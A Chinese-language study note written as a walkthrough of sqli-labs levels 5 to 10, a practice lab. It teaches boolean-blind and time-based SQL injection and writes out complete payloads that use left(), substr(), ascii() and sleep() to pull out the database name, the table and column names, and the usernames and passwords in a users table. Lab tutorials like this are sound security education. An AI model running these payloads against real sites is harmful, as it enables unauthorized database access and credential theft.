学习目标：

sql-labs5-10关

学习时间：

2021.4.4

学习产出：

前言:

清明节放三天假,哎!都去玩了,都去玩了,留下孤独的我与阿尉在学校周围乱转,不过,正好在这个时间把之前学习过的没整理的学习产出整理下来,再学习一点新的东西!

补充：

咱们先补充一些知识点,布尔盲驻,注入的语句返回只会返回1和0,1就是对的,而0就是错的!

left()函数: left(database(),1)=‘s’ left(a,b)从截取a的前b位,正确则返回1,错误则返回0
regexp函数: select user() regexp ‘r’ user()的结果是root,regexp为匹配root的正则表达式
like函数:select user() like ‘ro%’ 匹配与regexp相似
sbustr(a,b,c) select substr() xx xx substr(a,b,c)从位置b开始,截取a字符串c位长度
ascii() 将某个字符串转化为ascii的值

chr(‘数字’) 或者是ord(‘字母’) 使用python中的两个函数可以判断当前的ascii值是多少
对于security数据库:
注入时 注意加and

left((select database()),1)='s'--+         前1位是否是s 
(select database()） regexp 's';       匹配第一个字符是否是s
(select database()) like 's%';     匹配第一个字符是否是s
(select substr((select database()),1,1))='s'; 匹配第一个字符是否是s
(select substr ((select database()),1,3))='sec';  匹配前三个字符是否是sec
(select ascii(substr((select database()),1,1)));  直接回显115  或者是  s
(select ascii(substr((select database()),1,1)))>110;  如果大于110,就会返回1,

否则返回0
sleep函数
时间延迟型手工注入，正确会延迟，错误没有延迟。
可以通过浏览器的刷新提示观察延迟情况，但是id正确的时候的回显有利于观察。
构造sql语句，带上时间延迟的函数，如果有明显的延迟说明有注入点。

第五关:

闭合符号的判断都没啥说的了，然后直接order by 判断列数， 咱们直接上干货！

?id=1’ and if(length(database())=8,sleep(5),1)--+

当你的数据库长度为8时，输出就会延迟5秒钟，如果不是8，则不会延迟

说明数据库的长度是8，然后下一步就是爆出数据库

?id=1' and left((select database()),1)='s'--+ 
?id=1' and left((select database()),2)='se'--+ 
.
.
.
?id=1' and left((select database()),8)='security'--+ 

然后下一步就是猜表名

?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users'--+

然后就是判断列名

?id=1' and left((select column_name from information_schema.columns where table_name= 'users' limit 4,1),8)='username'--+

limit 4,1是username,limit 3,1是id
limit 5,1是password
最后一步就是猜值

?id=1’ and left((select password from users order by id limit 0,1),4)=‘dumb’ --+

?id=1’ and left((select username from users order by id limit 0,1),4)=‘dumb’ --+

第六关:

与第五关一样,就是前面的单引号闭合转换成了双引号闭合,这里就不阐述了.
上面的注入都是经过靶场亲自实验成功才写下来的,希望对你们有所帮助

第七关:

第七关也是布尔盲驻,也是闭合符号不同,这里也再讲一下闭合符号的判断吧
先输入一个’

发现报错,然后输入注释符号–+,发现还报错,说明不止是’,然后再输入),发现还是报错,说明还有东西,就再输入一个),发现就不再报错了,说明闭合符号就是’))

剩下的其实跟第五关一样

第八关:

第八关跟第五关可以说差不多真的是一模一样,先判断闭合符号,发现输入 ’ 报错,再输入–+,就不再报错,说明 ’ 就是闭合符号,剩下的输入跟第五关一模一样,就没啥说的了

第九关:

输入 ’ " 发现都不报错,咱么就加一个sleep函数,

id=1' and sleep(5) --+

会发现,当输入的是id=1’ 时,页面执行五秒后才刷新,而其他的注入都没这个效果,判断出闭合符号就是 ’
这里开始sleep函数的注入,left函数在这一题中判断不出来,无论对错,都是对的

?id=1' and if(length(database())=8,sleep(5),1)--+    
页面延迟了五秒,数据库的长度就是8

猜数据库的名字

?id=1' and if(left(database(),1)='s',sleep(5),1)--+
'
'
?id=1' and if(left(database(),1)='security',sleep(5),8)--+

猜表的名字

?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users',sleep(5),5)--+

猜列的名字

?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='username',sleep(5),1)--+

limit 5,1 是password
猜最后的值

?id=1’ and if(left((select password from users order by id limit 0,1),4)=‘dumb’ ,sleep(5),1)–+

?id=1’ and if(left((select username from users order by id limit 0,1),4)=‘dumb’ ,sleep(5),1)–+

第十关:

第十关就是在第九关的基础上,只是最前面的闭合符号从刚开始的 ’ 变成了 "
其他的都不变!

加油！